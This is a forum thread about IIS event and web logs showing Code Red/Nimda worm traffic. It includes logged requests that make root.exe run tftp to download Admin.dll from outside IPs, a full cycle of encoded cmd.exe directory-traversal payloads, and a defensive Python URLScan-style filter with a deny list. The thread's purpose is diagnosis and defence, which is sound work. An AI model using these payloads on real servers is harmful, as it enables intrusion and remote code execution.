Looks like someone was trying to hack my IIS4
Posted in the Windows Networking category.
Hi there, I just need some confirmation from you guys... when I was checking my event logs this morning I found the following items in my system log:
alert #1 source: DCOM
DCOM got error "Logon failure: unknown user name or bad password. " and was unable to logon MyDomain\Administrator in order to run the server:
{90A5EBFD-60BD-11D3-8164-204C4F4F5020}
alert #2 Source: W3SVC
The script started from the URL '/MSADC/root.exe' with parameters
'/c+tftp%20-i%20207.164.214.66%20GET%20Admin.dll%20Admin.dll' has not responded within the
configured timeout period. The HTTP server is terminating the script.
For additional information specific to this message please visit the Microsoft Online
Support site located at: http://www.microsoft.com/contentredirect.asp.
alert #3 source: W3SVC
The script started from the URL '/MSADC/root.exe' with parameters
'/c+tftp%20-i%20207.91.104.246%20GET%20Admin.dll%20Admin.dll' has not responded within the
configured timeout period. The HTTP server is terminating the script.
For additional information specific to this message please visit the Microsoft Online
Support site located at: http://www.microsoft.com/contentredirect.asp.
Is it true that someone was trying to compromise my server? Was he successful, or am I going to be fine? Thanks, and I look forward to hearing from you all! If you need more info, please let me know. Thanks!
regards,
Mugen C
Responses to this topic
While it looks like someone might be trying to get something not normally asked for, I am not familiar with that exploit. If you would like to be rid of the vast majority of crap from these simple but effective attacks, check out this tool:
http://support.microsoft.com/support/kb/articles/q307/6/08.asp
It's URLScan, and would have dropped those requests immediately if configured to do so (which it would by default, I believe). There is another tool here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/locktool.asp
and while it works well, it broke my use of OWA (Outlook Web Access) and I wound up removing it. It's a bit more powerful, and is based on the idea of how to deal with a situation if you are compromised vs. the other tool which blocks intended compromising attacks.
There is also the high security web template, which has worked against Code Red and other attacks as well, but is almost non-existent in the installed base of IIS servers on the 'net. You can find the template here:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/iis/tips/iis5chk.asp
down toward the middle. By the way, that page is also the security checklist for IIS5, and is full of useful information.
Hope this helps.
The attacks you list are part of Code Red. We have dozens of these in our event logs on our NT4 and 2000 IIS servers.
You can get a Code Red removal tool from Symantec which will remove the files and do a basic test to see if that machine is at risk.
Cool. I haven't seen entries like that in my event logs (probably due to the lockdown tools), but I do see the attacks via my IIS logs like so:
65.29.76.242 - 10/15/2001 10:49:09 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%252f../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/root.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /MSADC/root.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /c/winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /d/winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%255c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
That is one attack cycle, and I track these via an ASP app (which this was copied from) that queries my SQL logs DB. I am up to 900 hits today as of this post since midnight.
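An added example, not code from this thread or from URLScan itself, that ties the posts above together: it models the urlscan.ini settings the earlier reply points at (NormalizeUrlBeforeScan, VerifyNormalization, AllowHighBitCharacters=0 and the sample [DenyUrlSequences] list) as a Python check and runs it over the log lines just posted. Two lines are constructed in the same layout: one carrying the root.exe / tftp Admin.dll request from the first post with a 200 status, and one benign fetch; the 10.0.0.x client addresses and the status codes on those two lines are made up. The status is what answers the first poster's question: the 404s above mean /scripts/root.exe and /MSADC/root.exe were not on that server, whereas the W3SVC events in the first post say the script started, i.e. /MSADC/root.exe existed and IIS executed it, which is the backdoor copy of cmd.exe that Code Red II leaves behind and that the Nimda-style tftp Admin.dll request drives.

```python
"""URLScan-style request filter run over IIS log lines (added example)."""
from urllib.parse import unquote_to_bytes

# Sequences from the sample urlscan.ini [DenyUrlSequences] section.
DENY_SEQUENCES = ("..", "./", "\\", ":", "%", "&")
# Names that only appear in worm/scanner traffic against IIS: Code Red II's
# root.exe backdoor, cmd.exe itself, and the tftp / Admin.dll pair Nimda uses.
SUSPICIOUS_TOKENS = ("cmd.exe", "root.exe", "tftp", "admin.dll")

# First five lines copied from the post above; the last two are constructed
# (10.0.0.x clients and their status codes are made up for the example).
SAMPLE_LOG = """\
65.29.76.242 - 10/15/2001 10:49:09 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%252f../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /MSADC/root.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /c/winnt/system32/cmd.exe?/c+dir -
Info 10.0.0.5 - 10/15/2001 10:50:00 AM W3SVC3 SERVER-1 192.168.1.200 200 - /MSADC/root.exe?/c+tftp%20-i%20207.164.214.66%20GET%20Admin.dll%20Admin.dll -
Info 10.0.0.7 - 10/15/2001 10:51:00 AM W3SVC3 SERVER-1 192.168.1.200 200 - /default.htm -
"""


def parse_line(line):
    """Return (client_ip, status, uri) from a line in the posted layout:
    [Info] client user date time AM/PM site host server-ip status win32-status uri referer."""
    parts = line.split()
    if parts and parts[0] == "Info":   # column label the post's ASP listing prefixes
        parts = parts[1:]
    return parts[0], int(parts[8]), parts[10]


def classify(uri):
    """Sorted list of reasons a URLScan-style filter would reject uri ([] = passes)."""
    findings = set()
    once = unquote_to_bytes(uri)           # NormalizeUrlBeforeScan: decode once
    twice = unquote_to_bytes(once)
    if once != twice:                      # VerifyNormalization: a second decode still
        findings.add("double-encoding")    # changed it, e.g. %252f -> %2f -> /, %%35c -> %5c
    if any(b >= 0x80 for b in once):       # AllowHighBitCharacters=0
        try:
            once.decode("utf-8")
            findings.add("high-bit-chars")
        except UnicodeDecodeError:         # %c0%af and %c1%9c are overlong/invalid UTF-8
            findings.add("invalid-utf8")
    normalised = once.decode("latin-1")    # lossless byte->char map for sequence matching
    for seq in DENY_SEQUENCES:
        if seq in normalised:
            findings.add("deny-sequence:" + seq)
    fully_decoded = twice.decode("latin-1").lower()
    for token in SUSPICIOUS_TOKENS:
        if token in fully_decoded:
            findings.add("suspicious:" + token)
    return sorted(findings)


def scan(log_text):
    """Return (client, status, uri, findings) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, status, uri = parse_line(line)
        findings = classify(uri)
        if findings:
            hits.append((client, status, uri, findings))
    return hits


def attack_cycles(hits):
    """Flagged requests per client, like the per-source counts in the post's SQL report."""
    counts = {}
    for client, _, _, _ in hits:
        counts[client] = counts.get(client, 0) + 1
    return counts


def executed_backdoor(hits):
    """root.exe requests that got a 2xx: the file existed and IIS ran it, so the
    Code Red II backdoor is already on that box and the worm got a shell."""
    return [h for h in hits if "suspicious:root.exe" in h[3] and 200 <= h[1] < 300]


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for client, status, uri, findings in hits:
        print(f"{client} {status} {uri}\n    -> {', '.join(findings)}")
    print("per client:", attack_cycles(hits))
    print("backdoor executed:", [(h[0], h[2]) for h in executed_backdoor(hits)])
```

The double-decode and strict UTF-8 checks are what make this robust against the encoding variants in the cycle above: the filter does not need a pattern for every spelling of `\`, it only needs to refuse anything that is still encoded after one decode or that contains bytes a correct UTF-8 decoder rejects.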
I just started to get that DCOM error at home.
It only happens when I open Outlook Express.
It seems that MS Messenger is also trying to open, but since I never set it up (I removed it, actually) the thing times out.
Now my Outlook Express takes a long time to open.
This only happened since XP SP1.
If there's a delay opening Outlook Express, then it might be the same issue that affects Outlook. In Outlook, you can disable its ability to launch MS Messenger from within Tools>Options>Other. You might have something similar in OE.
Check this out. I will have to say this is a dirty trick from MS.
If I allow Messenger in the Group Policy then OE opens instantly,
and Messenger also opens, even though I removed it from Windows components.
If I disable access to Messenger then I get the DCOM error in the system events and OE opens really slowly.
This is a new thing in SP1.
I'm scanning the registry.
I thought that SP1 reinstalls MS Messenger if it wasn't there. Hence you're seeing it now. The delay behavior is consistent with Outlook when it is set up to launch MS Messenger and it isn't able to.
I removed Messenger from the Windows components and set
"use my current instant messaging service"
in the new window SP1 has to comply with the feds.
Voilà, no more Messenger when I boot.
Then I open OE and BAM!! there it is.
If I disable access through Group Policy then I get the delay but no Messenger.
It seems that Outlook Express opens Messenger even if it's uninstalled, and the only way to get rid of it is to deny access through gpedit, but the service still tries to connect, which is the cause of the "DCOM" error.
I really like MS, but man, that goes a little overboard.
Right, so you have to look for a way to tell OE not to launch MS Messenger anymore.
Absolutely.
So far I'm stumped (of course, I'm supposed to be working right now).
There were a couple of posts at this site telling of slow OE.
I suggest you visit http://wwwmonitortools.com/cat_web/; they have plenty of tools listed to verify whether your IIS server is well patched.
Regards,
Bart.